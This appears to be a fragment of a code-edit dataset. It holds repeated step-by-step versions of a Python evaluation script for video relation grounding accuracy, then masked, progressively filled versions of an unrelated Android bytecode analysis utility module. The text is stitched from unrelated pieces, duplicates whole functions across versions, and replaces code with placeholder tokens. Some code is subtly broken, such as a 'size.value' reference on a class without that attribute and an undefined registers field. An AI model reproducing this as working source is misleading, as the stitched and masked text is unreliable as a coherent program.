generate_track_link.main(res_file)\n grountruth = load_file(gt_file)\n prediction = load_file(res_file)\n evaluate(grountruth, prediction)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef eval_ground_scores(gt_relations, pred_relations, tiou_threshold):\n \"\"\"\n\n :param gt_relations:\n :param pred_relations:\n :param tiou_threshold:\n :return:\n \"\"\"\n relation_num = len(gt_relations)\n predict, predict_sub, predict_obj = 0, 0, 0\n for relation, pred_trajs in pred_relations.items():\n pred_sub = pred_trajs['sub']\n pred_obj = pred_trajs['obj']\n flag, flag_s, flag_o = False, False, False\n gt_trajs = gt_relations[relation]\n for gt_traj in gt_trajs:\n gt_sub = gt_traj['sub']\n gt_obj = gt_traj['obj']\n s_tiou = tiou(pred_sub, gt_sub)\n o_tiou = tiou(pred_obj, gt_obj)\n r_iou = min(s_tiou, o_tiou)\n if r_iou >= tiou_threshold:\n flag = True\n if s_tiou >= tiou_threshold:\n flag_s = True\n if o_tiou >= tiou_threshold:\n flag_o = True\n if flag:\n predict += 1\n if flag_s:\n predict_sub += 1\n if flag_o:\n predict_obj += 1\n predict = predict / relation_num\n predict_sub = predict_sub / relation_num\n predict_obj = predict_obj / relation_num\n return predict, predict_sub, predict_obj, relation_num\n\n\ndef evaluate(groundtruth, prediction, tiou_threshold=0.5):\n \"\"\" evaluate visual relation detection and visual \n relation tagging.\n \"\"\"\n video_num = len(groundtruth)\n print('Computing grounding accuracy over {} videos...'.format(video_num))\n acc, acc_sub, acc_obj = 0.0, 0.0, 0.0\n gt_rnum = 0\n for qid, relation_gt in groundtruth.items():\n if qid not in prediction:\n continue\n relation_pred = prediction[qid]\n if len(relation_pred) == 0:\n continue\n video_acc, video_acc_sub, video_acc_obj, relation_num = (\n eval_ground_scores(relation_gt, relation_pred, tiou_threshold))\n acc += video_acc\n acc_sub += video_acc_sub\n acc_obj += video_acc_obj\n gt_rnum += relation_num\n acc /= video_num\n acc_sub /= video_num\n acc_obj /= video_num\n print('Acc_S\\t Acc_O\\t Acc_R')\n print('{:.2f}\\t {:.2f}\\t {:.2f}'.format(acc_sub * 100, acc_obj * 100, \n acc * 100))\n\n\ndef main():\n groundtruth_dir = 'dataset/vidvrd/'\n gt_file = osp.join(groundtruth_dir, 'gt_relation_frame.json')\n result_dir = 'results/'\n res_file = osp.join(result_dir, 'test_viterbi_1gap_04_batch.json')\n if not osp.exists(res_file):\n print('Generating ...')\n generate_track_link.main(res_file)\n grountruth = load_file(gt_file)\n prediction = load_file(res_file)\n evaluate(grountruth, prediction)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import os.path as osp\nfrom evaluations.common import tiou\nfrom evaluations.util import load_file\nimport generate_track_link\n\n\ndef eval_ground_scores(gt_relations, pred_relations, tiou_threshold):\n \"\"\"\n\n :param gt_relations:\n :param pred_relations:\n :param tiou_threshold:\n :return:\n \"\"\"\n relation_num = len(gt_relations)\n predict, predict_sub, predict_obj = 0, 0, 0\n for relation, pred_trajs in pred_relations.items():\n pred_sub = pred_trajs['sub']\n pred_obj = pred_trajs['obj']\n flag, flag_s, flag_o = False, False, False\n gt_trajs = gt_relations[relation]\n for gt_traj in gt_trajs:\n gt_sub = gt_traj['sub']\n gt_obj = gt_traj['obj']\n s_tiou = tiou(pred_sub, gt_sub)\n o_tiou = tiou(pred_obj, gt_obj)\n r_iou = min(s_tiou, o_tiou)\n if r_iou >= tiou_threshold:\n flag = True\n if s_tiou >= tiou_threshold:\n flag_s = True\n if o_tiou >= tiou_threshold:\n flag_o = True\n if flag:\n predict += 1\n if flag_s:\n predict_sub += 1\n if flag_o:\n predict_obj += 1\n predict = predict / relation_num\n predict_sub = predict_sub / relation_num\n predict_obj = predict_obj / relation_num\n return predict, predict_sub, predict_obj, relation_num\n\n\ndef evaluate(groundtruth, prediction, tiou_threshold=0.5):\n \"\"\" evaluate visual relation detection and visual \n relation tagging.\n \"\"\"\n video_num = len(groundtruth)\n print('Computing grounding accuracy over {} videos...'.format(video_num))\n acc, acc_sub, acc_obj = 0.0, 0.0, 0.0\n gt_rnum = 0\n for qid, relation_gt in groundtruth.items():\n if qid not in prediction:\n continue\n relation_pred = prediction[qid]\n if len(relation_pred) == 0:\n continue\n video_acc, video_acc_sub, video_acc_obj, relation_num = (\n eval_ground_scores(relation_gt, relation_pred, tiou_threshold))\n acc += video_acc\n acc_sub += video_acc_sub\n acc_obj += video_acc_obj\n gt_rnum += relation_num\n acc /= video_num\n acc_sub /= video_num\n acc_obj /= video_num\n print('Acc_S\\t Acc_O\\t Acc_R')\n print('{:.2f}\\t {:.2f}\\t {:.2f}'.format(acc_sub * 100, acc_obj * 100, \n acc * 100))\n\n\ndef main():\n groundtruth_dir = 'dataset/vidvrd/'\n gt_file = osp.join(groundtruth_dir, 'gt_relation_frame.json')\n result_dir = 'results/'\n res_file = osp.join(result_dir, 'test_viterbi_1gap_04_batch.json')\n if not osp.exists(res_file):\n print('Generating ...')\n generate_track_link.main(res_file)\n grountruth = load_file(gt_file)\n prediction = load_file(res_file)\n evaluate(grountruth, prediction)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import os.path as osp\nfrom evaluations.common import tiou\nfrom evaluations.util import load_file\nimport generate_track_link\n\ndef eval_ground_scores(gt_relations, pred_relations, tiou_threshold):\n \"\"\"\n\n :param gt_relations:\n :param pred_relations:\n :param tiou_threshold:\n :return:\n \"\"\"\n # pred_relations = sorted(pred_relations, key=lambda x: x['score'], reverse=True)\n\n relation_num = len(gt_relations)\n predict, predict_sub, predict_obj = 0, 0, 0\n\n for relation, pred_trajs in pred_relations.items():\n pred_sub = pred_trajs['sub']\n pred_obj = pred_trajs['obj']\n flag, flag_s, flag_o = False, False, False\n\n gt_trajs = gt_relations[relation]\n\n # print(relation)\n\n for gt_traj in gt_trajs:\n gt_sub = gt_traj['sub']\n gt_obj = gt_traj['obj']\n s_tiou = tiou(pred_sub, gt_sub)\n o_tiou = tiou(pred_obj, gt_obj)\n r_iou = min(s_tiou, o_tiou)\n\n if r_iou >= tiou_threshold:\n flag = True\n if s_tiou >= tiou_threshold:\n flag_s = True\n if o_tiou >= tiou_threshold:\n flag_o = True\n if flag:\n predict += 1\n if flag_s:\n predict_sub += 1\n if flag_o:\n predict_obj += 1\n\n predict = predict / relation_num\n predict_sub = predict_sub /relation_num\n predict_obj = predict_obj /relation_num\n\n return predict, predict_sub, predict_obj, relation_num\n\n\ndef evaluate(groundtruth, prediction, tiou_threshold=0.5):\n \"\"\" evaluate visual relation detection and visual \n relation tagging.\n \"\"\"\n\n video_num = len(groundtruth)\n print('Computing grounding accuracy over {} videos...'.format(video_num))\n acc, acc_sub, acc_obj = 0.0, 0.0, 0.0\n\n gt_rnum = 0\n for qid, relation_gt in groundtruth.items():\n\n if qid not in prediction:\n continue\n relation_pred = prediction[qid]\n if len(relation_pred) == 0:\n continue\n\n video_acc, video_acc_sub, video_acc_obj, relation_num = eval_ground_scores(relation_gt, relation_pred, tiou_threshold)\n\n acc += video_acc\n acc_sub += video_acc_sub\n acc_obj += video_acc_obj\n gt_rnum += relation_num\n\n\n acc /= video_num\n acc_sub /= video_num\n acc_obj /= video_num\n\n print(\"Acc_S\\t Acc_O\\t Acc_R\")\n\n print('{:.2f}\\t {:.2f}\\t {:.2f}'.format(acc_sub*100, acc_obj*100, acc*100))\n\n\ndef main():\n\n groundtruth_dir = 'dataset/vidvrd/'\n gt_file = osp.join(groundtruth_dir, 'gt_relation_frame.json')\n\n result_dir = 'results/'\n res_file = osp.join(result_dir, 'test_viterbi_1gap_04_batch.json')\n if not osp.exists(res_file):\n print('Generating ...')\n generate_track_link.main(res_file)\n\n grountruth = load_file(gt_file)\n prediction = load_file(res_file)\n\n evaluate(grountruth, prediction)\n\n\nif __name__ == \"__main__\":\n main()\n\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class SVs(object):
def __init__(self, size, ntuple, buff):
self.__size = size
self.__value = ntuple._make(unpack(self.__size, buff))
def _get(self):
l = []
for i in self.__value._fields:
l.append(getattr(self.__value, i))
return pack(self.__size, *l)
<|reserved_special_token_0|>
def get_value_buff(self):
return self._get()
def get_value(self):
return self.__value
def set_value(self, attr):
self.__value = self.__value._replace(**attr)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class MethodBC(object):
def show(self, value):
getattr(self, 'show_' + value)()
class BuffHandle(object):
def __init__(self, buff):
self.__buff = bytearray(buff)
self.__idx = 0
def size(self):
return len(self.__buff)
def set_idx(self, idx):
self.__idx = idx
def get_idx(self):
return self.__idx
def readNullString(self, size):
data = self.read(size)
return data
def read_b(self, size):
return self.__buff[self.__idx:self.__idx + size]
def read_at(self, offset, size):
return self.__buff[offset:offset + size]
def read(self, size):
if isinstance(size, SV):
size = size.value
buff = self.__buff[self.__idx:self.__idx + size]
self.__idx += size
return buff
def end(self):
return self.__idx == len(self.__buff)
class Buff(object):
def __init__(self, offset, buff):
self.offset = offset
self.buff = buff
self.size = len(buff)
class _Bytecode(object):
def __init__(self, buff):
self.__buff = bytearray(buff)
self.__idx = 0
def read(self, size):
if isinstance(size, SV):
size = size.value
buff = self.__buff[self.__idx:self.__idx + size]
self.__idx += size
return buff
def readat(self, off):
if isinstance(off, SV):
off = off.value
return self.__buff[off:]
def read_b(self, size):
return self.__buff[self.__idx:self.__idx + size]
def set_idx(self, idx):
self.__idx = idx
def get_idx(self):
return self.__idx
def add_idx(self, idx):
self.__idx += idx
def register(self, type_register, fct):
self.__registers[type_register].append(fct)
def get_buff(self):
return self.__buff
def length_buff(self):
return len(self.__buff)
def set_buff(self, buff):
self.__buff = buff
def save(self, filename):
buff = self._save()
with open(filename, 'wb') as fd:
fd.write(buff)
<|reserved_special_token_0|>
class Node(object):
def __init__(self, n, s):
self.id = n
self.title = s
self.children = []
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def disable_print_colors():
colors = save_colors()
remove_colors()
return colors
<|reserved_special_token_0|>
def Warning(msg):
warning(msg)
def _PrintBanner():
print_fct = CONF['PRINT_FCT']
print_fct('*' * 75 + '\n')
<|reserved_special_token_0|>
def _PrintNote(note, tab=0):
print_fct = CONF['PRINT_FCT']
note_color = CONF['COLORS']['NOTE']
normal_color = CONF['COLORS']['NORMAL']
print_fct('\t' * tab + '%s# %s%s' % (note_color, note, normal_color) + '\n'
)
<|reserved_special_token_0|>
def _PrintXRef(tag, items):
print_fct = CONF['PRINT_FCT']
for i in items:
print_fct('%s: %s %s %s %s\n' % (tag, i[0].get_class_name(), i[0].
get_name(), i[0].get_descriptor(), ' '.join('%x' % j.get_idx() for
j in i[1])))
<|reserved_special_token_0|>
def _PrintDefault(msg):
print_fct = CONF['PRINT_FCT']
print_fct(msg)
def PrettyShow(m_a, basic_blocks, notes={}):
idx = 0
nb = 0
offset_color = CONF['COLORS']['OFFSET']
offset_addr_color = CONF['COLORS']['OFFSET_ADDR']
instruction_name_color = CONF['COLORS']['INSTRUCTION_NAME']
branch_false_color = CONF['COLORS']['BRANCH_FALSE']
branch_true_color = CONF['COLORS']['BRANCH_TRUE']
branch_color = CONF['COLORS']['BRANCH']
exception_color = CONF['COLORS']['EXCEPTION']
bb_color = CONF['COLORS']['BB']
normal_color = CONF['COLORS']['NORMAL']
print_fct = CONF['PRINT_FCT']
colors = CONF['COLORS']['OUTPUT']
for i in basic_blocks:
print_fct('%s%s%s : \n' % (bb_color, i.get_name(), normal_color))
instructions = i.get_instructions()
for ins in instructions:
if nb in notes:
for note in notes[nb]:
_PrintNote(note, 1)
print_fct('\t%s%-3d%s(%s%08x%s) ' % (offset_color, nb,
normal_color, offset_addr_color, idx, normal_color))
print_fct('%s%-20s%s' % (instruction_name_color, ins.get_name(),
normal_color))
operands = ins.get_operands()
print_fct('%s' % ', '.join(m_a.get_vm().colorize_operands(
operands, colors)))
op_value = ins.get_op_value()
if ins == instructions[-1] and i.childs:
print_fct(' ')
if (op_value == 43 or op_value == 44) and len(i.childs) > 1:
values = i.get_special_ins(idx).get_values()
print_fct('%s[ D:%s%s ' % (branch_false_color, i.childs
[0][2].get_name(), branch_color))
print_fct(' '.join('%d:%s' % (values[j], i.childs[j + 1
][2].get_name()) for j in range(0, len(i.childs) -
1)) + ' ]%s' % normal_color)
elif len(i.childs) == 2:
print_fct('%s[ %s%s ' % (branch_false_color, i.childs[0
][2].get_name(), branch_true_color))
print_fct(' '.join('%s' % c[2].get_name() for c in i.
childs[1:]) + ' ]%s' % normal_color)
else:
print_fct('%s[ ' % branch_color + ' '.join('%s' % c[2].
get_name() for c in i.childs) + ' ]%s' % normal_color)
idx += ins.get_length()
nb += 1
print_fct('\n')
if i.get_exception_analysis():
print_fct('\t%s%s%s\n' % (exception_color, i.exception_analysis
.show_buff(), normal_color))
print_fct('\n')
class TmpBlock(object):
def __init__(self, name):
self.name = name
def get_name(self):
return self.name
def method2json(mx, directed_graph=False):
if directed_graph:
return method2json_direct(mx)
return method2json_undirect(mx)
def method2json_undirect(mx):
d = {}
reports = []
d['reports'] = reports
for DVMBasicMethodBlock in mx.basic_blocks.gets():
cblock = {}
cblock['BasicBlockId'] = DVMBasicMethodBlock.get_name()
cblock['registers'] = mx.get_method().get_code().get_registers_size()
cblock['instructions'] = []
ins_idx = DVMBasicMethodBlock.start
for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(
):
c_ins = {}
c_ins['idx'] = ins_idx
c_ins['name'] = DVMBasicMethodBlockInstruction.get_name()
c_ins['operands'] = DVMBasicMethodBlockInstruction.get_operands(
ins_idx)
cblock['instructions'].append(c_ins)
ins_idx += DVMBasicMethodBlockInstruction.get_length()
cblock['Edge'] = []
for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:
cblock['Edge'].append(DVMBasicMethodBlockChild[-1].get_name())
reports.append(cblock)
return json.dumps(d)
def method2json_direct(mx):
d = {}
reports = []
d['reports'] = reports
hooks = {}
l = []
for DVMBasicMethodBlock in mx.basic_blocks.gets():
for index, DVMBasicMethodBlockChild in enumerate(DVMBasicMethodBlock
.childs):
if DVMBasicMethodBlock.get_name() == DVMBasicMethodBlockChild[-1
].get_name():
preblock = TmpBlock(DVMBasicMethodBlock.get_name() + '-pre')
cnblock = {}
cnblock['BasicBlockId'] = DVMBasicMethodBlock.get_name(
) + '-pre'
cnblock['start'] = DVMBasicMethodBlock.start
cnblock['notes'] = []
cnblock['Edge'] = [DVMBasicMethodBlock.get_name()]
cnblock['registers'] = 0
cnblock['instructions'] = []
cnblock['info_bb'] = 0
l.append(cnblock)
for parent in DVMBasicMethodBlock.fathers:
hooks[parent[-1].get_name()] = []
hooks[parent[-1].get_name()].append(preblock)
for idx, child in enumerate(parent[-1].childs):
if child[-1].get_name(
) == DVMBasicMethodBlock.get_name():
hooks[parent[-1].get_name()].append(child[-1])
for DVMBasicMethodBlock in mx.basic_blocks.gets():
cblock = {}
cblock['BasicBlockId'] = DVMBasicMethodBlock.get_name()
cblock['start'] = DVMBasicMethodBlock.start
cblock['notes'] = DVMBasicMethodBlock.get_notes()
cblock['registers'] = mx.get_method().get_code().get_registers_size()
cblock['instructions'] = []
ins_idx = DVMBasicMethodBlock.start
last_instru = None
for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(
):
c_ins = {}
c_ins['idx'] = ins_idx
c_ins['name'] = DVMBasicMethodBlockInstruction.get_name()
c_ins['operands'] = DVMBasicMethodBlockInstruction.get_operands(
ins_idx)
c_ins['formatted_operands'
] = DVMBasicMethodBlockInstruction.get_formatted_operands()
cblock['instructions'].append(c_ins)
if DVMBasicMethodBlockInstruction.get_op_value(
) == 43 or DVMBasicMethodBlockInstruction.get_op_value() == 44:
values = DVMBasicMethodBlock.get_special_ins(ins_idx)
cblock['info_next'] = values.get_values()
ins_idx += DVMBasicMethodBlockInstruction.get_length()
last_instru = DVMBasicMethodBlockInstruction
cblock['info_bb'] = 0
if DVMBasicMethodBlock.childs:
if len(DVMBasicMethodBlock.childs) > 1:
cblock['info_bb'] = 1
if last_instru.get_op_value() == 43 or last_instru.get_op_value(
) == 44:
cblock['info_bb'] = 2
cblock['Edge'] = []
for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:
ok = False
if DVMBasicMethodBlock.get_name() in hooks:
if DVMBasicMethodBlockChild[-1] in hooks[DVMBasicMethodBlock
.get_name()]:
ok = True
cblock['Edge'].append(hooks[DVMBasicMethodBlock.
get_name()][0].get_name())
if not ok:
cblock['Edge'].append(DVMBasicMethodBlockChild[-1].get_name())
exception_analysis = DVMBasicMethodBlock.get_exception_analysis()
if exception_analysis:
cblock['Exceptions'] = exception_analysis.get()
reports.append(cblock)
reports.extend(l)
return json.dumps(d)
class SV(object):
def __init__(self, size, buff):
self.__size = size
self.__value = unpack(self.__size, buff)[0]
def _get(self):
return pack(self.__size, self.__value)
def __str__(self):
return '0x%x' % self.__value
def __int__(self):
return self.__value
def get_value_buff(self):
return self._get()
def get_value(self):
return self.__value
def set_value(self, attr):
self.__value = attr
class SVs(object):
def __init__(self, size, ntuple, buff):
self.__size = size
self.__value = ntuple._make(unpack(self.__size, buff))
def _get(self):
l = []
for i in self.__value._fields:
l.append(getattr(self.__value, i))
return pack(self.__size, *l)
def _export(self):
return [x for x in self.__value._fields]
def get_value_buff(self):
return self._get()
def get_value(self):
return self.__value
def set_value(self, attr):
self.__value = self.__value._replace(**attr)
def __str__(self):
return self.__value.__str__()
<|reserved_special_token_0|>
class MethodBC(object):
def show(self, value):
getattr(self, 'show_' + value)()
class BuffHandle(object):
def __init__(self, buff):
self.__buff = bytearray(buff)
self.__idx = 0
def size(self):
return len(self.__buff)
def set_idx(self, idx):
self.__idx = idx
def get_idx(self):
return self.__idx
def readNullString(self, size):
data = self.read(size)
return data
def read_b(self, size):
return self.__buff[self.__idx:self.__idx + size]
def read_at(self, offset, size):
return self.__buff[offset:offset + size]
def read(self, size):
if isinstance(size, SV):
size = size.value
buff = self.__buff[self.__idx:self.__idx + size]
self.__idx += size
return buff
def end(self):
return self.__idx == len(self.__buff)
class Buff(object):
def __init__(self, offset, buff):
self.offset = offset
self.buff = buff
self.size = len(buff)
class _Bytecode(object):
def __init__(self, buff):
self.__buff = bytearray(buff)
self.__idx = 0
def read(self, size):
if isinstance(size, SV):
size = size.value
buff = self.__buff[self.__idx:self.__idx + size]
self.__idx += size
return buff
def readat(self, off):
if isinstance(off, SV):
off = off.value
return self.__buff[off:]
def read_b(self, size):
return self.__buff[self.__idx:self.__idx + size]
def set_idx(self, idx):
self.__idx = idx
def get_idx(self):
return self.__idx
def add_idx(self, idx):
self.__idx += idx
def register(self, type_register, fct):
self.__registers[type_register].append(fct)
def get_buff(self):
return self.__buff
def length_buff(self):
return len(self.__buff)
def set_buff(self, buff):
self.__buff = buff
def save(self, filename):
buff = self._save()
with open(filename, 'wb') as fd:
fd.write(buff)
def FormatClassToJava(input):
"""
Transoform a typical xml format class into java format
:param input: the input class name
:rtype: string
"""
return 'L' + input.replace('.', '/') + ';'
def FormatClassToPython(input):
i = input[:-1]
i = i.replace('/', '_')
i = i.replace('$', '_')
return i
def FormatNameToPython(input):
i = input.replace('<', '')
i = i.replace('>', '')
i = i.replace('$', '_')
return i
def FormatDescriptorToPython(input):
i = input.replace('/', '_')
i = i.replace(';', '')
i = i.replace('[', '')
i = i.replace('(', '')
i = i.replace(')', '')
i = i.replace(' ', '')
i = i.replace('$', '')
return i
class Node(object):
def __init__(self, n, s):
self.id = n
self.title = s
self.children = []
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def disable_print_colors():
colors = save_colors()
remove_colors()
return colors
def enable_print_colors(colors):
enable_colors(colors)
<|reserved_special_token_0|>
def Warning(msg):
warning(msg)
def _PrintBanner():
print_fct = CONF['PRINT_FCT']
print_fct('*' * 75 + '\n')
<|reserved_special_token_0|>
def _PrintNote(note, tab=0):
print_fct = CONF['PRINT_FCT']
note_color = CONF['COLORS']['NOTE']
normal_color = CONF['COLORS']['NORMAL']
print_fct('\t' * tab + '%s# %s%s' % (note_color, note, normal_color) + '\n'
)
<|reserved_special_token_0|>
def _PrintXRef(tag, items):
print_fct = CONF['PRINT_FCT']
for i in items:
print_fct('%s: %s %s %s %s\n' % (tag, i[0].get_class_name(), i[0].
get_name(), i[0].get_descriptor(), ' '.join('%x' % j.get_idx() for
j in i[1])))
<|reserved_special_token_0|>
def _PrintDefault(msg):
print_fct = CONF['PRINT_FCT']
print_fct(msg)
def PrettyShow(m_a, basic_blocks, notes={}):
idx = 0
nb = 0
offset_color = CONF['COLORS']['OFFSET']
offset_addr_color = CONF['COLORS']['OFFSET_ADDR']
instruction_name_color = CONF['COLORS']['INSTRUCTION_NAME']
branch_false_color = CONF['COLORS']['BRANCH_FALSE']
branch_true_color = CONF['COLORS']['BRANCH_TRUE']
branch_color = CONF['COLORS']['BRANCH']
exception_color = CONF['COLORS']['EXCEPTION']
bb_color = CONF['COLORS']['BB']
normal_color = CONF['COLORS']['NORMAL']
print_fct = CONF['PRINT_FCT']
colors = CONF['COLORS']['OUTPUT']
for i in basic_blocks:
print_fct('%s%s%s : \n' % (bb_color, i.get_name(), normal_color))
instructions = i.get_instructions()
for ins in instructions:
if nb in notes:
for note in notes[nb]:
_PrintNote(note, 1)
print_fct('\t%s%-3d%s(%s%08x%s) ' % (offset_color, nb,
normal_color, offset_addr_color, idx, normal_color))
print_fct('%s%-20s%s' % (instruction_name_color, ins.get_name(),
normal_color))
operands = ins.get_operands()
print_fct('%s' % ', '.join(m_a.get_vm().colorize_operands(
operands, colors)))
op_value = ins.get_op_value()
if ins == instructions[-1] and i.childs:
print_fct(' ')
if (op_value == 43 or op_value == 44) and len(i.childs) > 1:
values = i.get_special_ins(idx).get_values()
print_fct('%s[ D:%s%s ' % (branch_false_color, i.childs
[0][2].get_name(), branch_color))
print_fct(' '.join('%d:%s' % (values[j], i.childs[j + 1
][2].get_name()) for j in range(0, len(i.childs) -
1)) + ' ]%s' % normal_color)
elif len(i.childs) == 2:
print_fct('%s[ %s%s ' % (branch_false_color, i.childs[0
][2].get_name(), branch_true_color))
print_fct(' '.join('%s' % c[2].get_name() for c in i.
childs[1:]) + ' ]%s' % normal_color)
else:
print_fct('%s[ ' % branch_color + ' '.join('%s' % c[2].
get_name() for c in i.childs) + ' ]%s' % normal_color)
idx += ins.get_length()
nb += 1
print_fct('\n')
if i.get_exception_analysis():
print_fct('\t%s%s%s\n' % (exception_color, i.exception_analysis
.show_buff(), normal_color))
print_fct('\n')
class TmpBlock(object):
def __init__(self, name):
self.name = name
def get_name(self):
return self.name
def method2json(mx, directed_graph=False):
if directed_graph:
return method2json_direct(mx)
return method2json_undirect(mx)
def method2json_undirect(mx):
d = {}
reports = []
d['reports'] = reports
for DVMBasicMethodBlock in mx.basic_blocks.gets():
cblock = {}
cblock['BasicBlockId'] = DVMBasicMethodBlock.get_name()
cblock['registers'] = mx.get_method().get_code().get_registers_size()
cblock['instructions'] = []
ins_idx = DVMBasicMethodBlock.start
for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(
):
c_ins = {}
c_ins['idx'] = ins_idx
c_ins['name'] = DVMBasicMethodBlockInstruction.get_name()
c_ins['operands'] = DVMBasicMethodBlockInstruction.get_operands(
ins_idx)
cblock['instructions'].append(c_ins)
ins_idx += DVMBasicMethodBlockInstruction.get_length()
cblock['Edge'] = []
for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:
cblock['Edge'].append(DVMBasicMethodBlockChild[-1].get_name())
reports.append(cblock)
return json.dumps(d)
def method2json_direct(mx):
d = {}
reports = []
d['reports'] = reports
hooks = {}
l = []
for DVMBasicMethodBlock in mx.basic_blocks.gets():
for index, DVMBasicMethodBlockChild in enumerate(DVMBasicMethodBlock
.childs):
if DVMBasicMethodBlock.get_name() == DVMBasicMethodBlockChild[-1
].get_name():
preblock = TmpBlock(DVMBasicMethodBlock.get_name() + '-pre')
cnblock = {}
cnblock['BasicBlockId'] = DVMBasicMethodBlock.get_name(
) + '-pre'
cnblock['start'] = DVMBasicMethodBlock.start
cnblock['notes'] = []
cnblock['Edge'] = [DVMBasicMethodBlock.get_name()]
cnblock['registers'] = 0
cnblock['instructions'] = []
cnblock['info_bb'] = 0
l.append(cnblock)
for parent in DVMBasicMethodBlock.fathers:
hooks[parent[-1].get_name()] = []
hooks[parent[-1].get_name()].append(preblock)
for idx, child in enumerate(parent[-1].childs):
if child[-1].get_name(
) == DVMBasicMethodBlock.get_name():
hooks[parent[-1].get_name()].append(child[-1])
for DVMBasicMethodBlock in mx.basic_blocks.gets():
cblock = {}
cblock['BasicBlockId'] = DVMBasicMethodBlock.get_name()
cblock['start'] = DVMBasicMethodBlock.start
cblock['notes'] = DVMBasicMethodBlock.get_notes()
cblock['registers'] = mx.get_method().get_code().get_registers_size()
cblock['instructions'] = []
ins_idx = DVMBasicMethodBlock.start
last_instru = None
for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(
):
c_ins = {}
c_ins['idx'] = ins_idx
c_ins['name'] = DVMBasicMethodBlockInstruction.get_name()
c_ins['operands'] = DVMBasicMethodBlockInstruction.get_operands(
ins_idx)
c_ins['formatted_operands'
] = DVMBasicMethodBlockInstruction.get_formatted_operands()
cblock['instructions'].append(c_ins)
if DVMBasicMethodBlockInstruction.get_op_value(
) == 43 or DVMBasicMethodBlockInstruction.get_op_value() == 44:
values = DVMBasicMethodBlock.get_special_ins(ins_idx)
cblock['info_next'] = values.get_values()
ins_idx += DVMBasicMethodBlockInstruction.get_length()
last_instru = DVMBasicMethodBlockInstruction
cblock['info_bb'] = 0
if DVMBasicMethodBlock.childs:
if len(DVMBasicMethodBlock.childs) > 1:
cblock['info_bb'] = 1
if last_instru.get_op_value() == 43 or last_instru.get_op_value(
) == 44:
cblock['info_bb'] = 2
cblock['Edge'] = []
for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:
ok = False
if DVMBasicMethodBlock.get_name() in hooks:
if DVMBasicMethodBlockChild[-1] in hooks[DVMBasicMethodBlock
.get_name()]:
ok = True
cblock['Edge'].append(hooks[DVMBasicMethodBlock.
get_name()][0].get_name())
if not ok:
cblock['Edge'].append(DVMBasicMethodBlockChild[-1].get_name())
exception_analysis = DVMBasicMethodBlock.get_exception_analysis()
if exception_analysis:
cblock['Exceptions'] = exception_analysis.get()
reports.append(cblock)
reports.extend(l)
return json.dumps(d)
class SV(object):
def __init__(self, size, buff):
self.__size = size
self.__value = unpack(self.__size, buff)[0]
def _get(self):
return pack(self.__size, self.__value)
def __str__(self):
return '0x%x' % self.__value
def __int__(self):
return self.__value
def get_value_buff(self):
return self._get()
def get_value(self):
return self.__value
def set_value(self, attr):
self.__value = attr
class SVs(object):
def __init__(self, size, ntuple, buff):
self.__size = size
self.__value = ntuple._make(unpack(self.__size, buff))
def _get(self):
l = []
for i in self.__value._fields:
l.append(getattr(self.__value, i))
return pack(self.__size, *l)
def _export(self):
return [x for x in self.__value._fields]
def get_value_buff(self):
return self._get()
def get_value(self):
return self.__value
def set_value(self, attr):
self.__value = self.__value._replace(**attr)
def __str__(self):
return self.__value.__str__()
<|reserved_special_token_0|>
class MethodBC(object):
def show(self, value):
getattr(self, 'show_' + value)()
class BuffHandle(object):
def __init__(self, buff):
self.__buff = bytearray(buff)
self.__idx = 0
def size(self):
return len(self.__buff)
def set_idx(self, idx):
self.__idx = idx
def get_idx(self):
return self.__idx
def readNullString(self, size):
data = self.read(size)
return data
def read_b(self, size):
return self.__buff[self.__idx:self.__idx + size]
def read_at(self, offset, size):
return self.__buff[offset:offset + size]
def read(self, size):
if isinstance(size, SV):
size = size.value
buff = self.__buff[self.__idx:self.__idx + size]
self.__idx += size
return buff
def end(self):
return self.__idx == len(self.__buff)
class Buff(object):
def __init__(self, offset, buff):
self.offset = offset
self.buff = buff
self.size = len(buff)
class _Bytecode(object):
def __init__(self, buff):
self.__buff = bytearray(buff)
self.__idx = 0
def read(self, size):
if isinstance(size, SV):
size = size.value
buff = self.__buff[self.__idx:self.__idx + size]
self.__idx += size
return buff
def readat(self, off):
if isinstance(off, SV):
off = off.value
return self.__buff[off:]
def read_b(self, size):
return self.__buff[self.__idx:self.__idx + size]
def set_idx(self, idx):
self.__idx = idx
def get_idx(self):
return self.__idx
def add_idx(self, idx):
self.__idx += idx
def register(self, type_register, fct):
self.__registers[type_register].append(fct)
def get_buff(self):
return self.__buff
def length_buff(self):
return len(self.__buff)
def set_buff(self, buff):
self.__buff = buff
def save(self, filename):
buff = self._save()
with open(filename, 'wb') as fd:
fd.write(buff)
def FormatClassToJava(input):
"""
Transoform a typical xml format class into java format
:param input: the input class name
:rtype: string
"""
return 'L' + input.replace('.', '/') + ';'
def FormatClassToPython(input):
i = input[:-1]
i = i.replace('/', '_')
i = i.replace('$', '_')
return i
def FormatNameToPython(input):
i = input.replace('<', '')
i = i.replace('>', '')
i = i.replace('$', '_')
return i
def FormatDescriptorToPython(input):
i = input.replace('/', '_')
i = i.replace(';', '')
i = i.replace('[', '')
i = i.replace('(', '')
i = i.replace(')', '')
i = i.replace(' ', '')
i = i.replace('$', '')
return i
class Node(object):
def __init__(self, n, s):
self.id = n
self.title = s
self.children = []
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def disable_print_colors():
colors = save_colors()
remove_colors()
return colors
def enable_print_colors(colors):
enable_colors(colors)
<|reserved_special_token_0|>
def Warning(msg):
warning(msg)
def _PrintBanner():
print_fct = CONF['PRINT_FCT']
print_fct('*' * 75 + '\n')
def _PrintSubBanner(title=None):
print_fct = CONF['PRINT_FCT']
if title == None:
print_fct('#' * 20 + '\n')
else:
print_fct('#' * 10 + ' ' + title + '\n')
